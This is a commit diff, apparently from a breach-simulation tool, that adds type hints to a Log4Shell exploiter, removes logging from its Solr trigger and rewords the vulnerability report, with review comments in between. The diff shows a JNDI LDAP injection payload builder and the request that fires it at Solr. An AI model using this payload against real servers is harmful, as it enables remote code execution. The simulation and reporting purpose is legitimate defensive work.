Agent, Island: Minor changes to Log4Shell
Add return types, remove logging from the Solr service, and change Log4j to Log4Shell in Island reporting
parent
311a721880
commit
51bf553fb5
|
@ -116,12 +116,12 @@ class Log4ShellExploiter(WebRCE):
|
|||
|
||||
self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||
|
||||
def _build_ldap_payload(self):
|
||||
def _build_ldap_payload(self) -> str:
|
||||
interface_ip = get_interface_to_target(self.host.ip_addr)
|
||||
return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
|
||||
|
||||
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
|
||||
def _build_command(self, path, http_path):
|
||||
def _build_command(self, path, http_path) -> str:
|
||||
# Build command to execute
|
||||
monkey_cmd = build_monkey_commandline(
|
||||
self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path
|
||||
|
|
|
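Review bot: `_build_command(self, path, http_path) -> str` now declares its return type but leaves `path` and `http_path` unannotated, so the signature is only half typed. If both are strings, as passing `location=path` suggests, `def _build_command(self, path: str, http_path: str) -> str:` would complete it. `_build_ldap_payload` also formats the result of `get_interface_to_target` straight into the returned string; if that helper can return `None` (not visible here), the method returns a URI containing the literal text `None` instead of failing, so a guard or a comment stating the helper's contract would help. The body of `_build_command` continues outside the hunk.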
@ -15,8 +15,6 @@ class SolrExploit(IServiceExploiter):
|
|||
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
||||
url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
|
||||
try:
|
||||
logger.debug("Sending malicious SOLR log4j request")
|
||||
requests.post(url, timeout=5, verify=False) # noqa DUO123
|
||||
logger.debug("Request sent")
|
||||
except requests.ReadTimeout as e:
|
||||
logger.debug(f"Log4shell request failed {e}")
|
||||
|
|
|
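Review bot: The `except requests.ReadTimeout` clause in `trigger_exploit` is the only handler around `requests.post`, so a refused connection or a connect timeout (`requests.ConnectionError`, `requests.ConnectTimeout`) propagates to the caller unless it is handled there. With the two debug lines removed, nothing is logged for that host and port in those cases, which makes it harder for an operator to correlate simulation traffic with what their detections recorded. Consider `except requests.RequestException as e:` with a message that names `host.ip_addr` and `port`. Since this commit adds return types elsewhere, `trigger_exploit` could also be annotated `-> None` if it returns nothing; the function may continue past the hunk.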
@ -55,7 +55,7 @@ class ExploiterDescriptorEnum(Enum):
|
|||
POWERSHELL = ExploiterDescriptor(
|
||||
"PowerShellExploiter", "PowerShell Remoting Exploiter", ExploitProcessor
|
||||
)
|
||||
LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4j Exploiter", Log4ShellProcessor)
|
||||
LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4Shell Exploiter", Log4ShellProcessor)
|
||||
|
||||
@staticmethod
|
||||
def get_by_class_name(class_name: str) -> ExploiterDescriptor:
|
||||
|
|
|
@ -2,19 +2,19 @@ import React from 'react';
|
|||
import CollapsibleWellComponent from '../CollapsibleWell';
|
||||
|
||||
export function log4shellIssueOverview() {
|
||||
return (<li>Some servers are vulnerable to log4shell remote code execution exploit.</li>)
|
||||
return (<li>Some servers are vulnerable to the Log4Shell remote code execution exploit.</li>)
|
||||
}
|
||||
|
||||
export function log4shellIssueReport(issue) {
|
||||
return (
|
||||
<>
|
||||
Upgrade the log4j component to version 2.15.0 or later.
|
||||
Upgrade the Apache Log4j component to version 2.15.0 or later.
|
||||
<CollapsibleWellComponent>
|
||||
The {issue.service} server <span className="badge badge-primary">{issue.machine}</span> (<span
|
||||
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}:{issue.port}</span>) is vulnerable to <span
|
||||
className="badge badge-danger">log4shell remote code execution</span> attack.
|
||||
className="badge badge-danger">the Log4Shell remote code execution</span> attack.
|
||||
<br/>
|
||||
The attack was made possible due to an old version of log4j component.
|
||||
The attack was made possible due to an old version of Apache Log4j component.
|
||||
</CollapsibleWellComponent>
|
||||
</>
|
||||
);
|
||||
|
|
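Review bot: The remediation string `Upgrade the Apache Log4j component to version 2.15.0 or later.` still anchors the advice on 2.15.0, a release whose fix Apache later found incomplete and superseded with further Log4j 2 security releases. A reader who stops at 2.15.0 may remain exposed in some configurations. Since this commit is already rewording the report, consider `Upgrade the Apache Log4j component to the latest available version.` or a link to the Apache Log4j security page. The last sentence also needs an article: `due to an old version of the Apache Log4j component`. `log4shellIssueReport` closes outside the hunk.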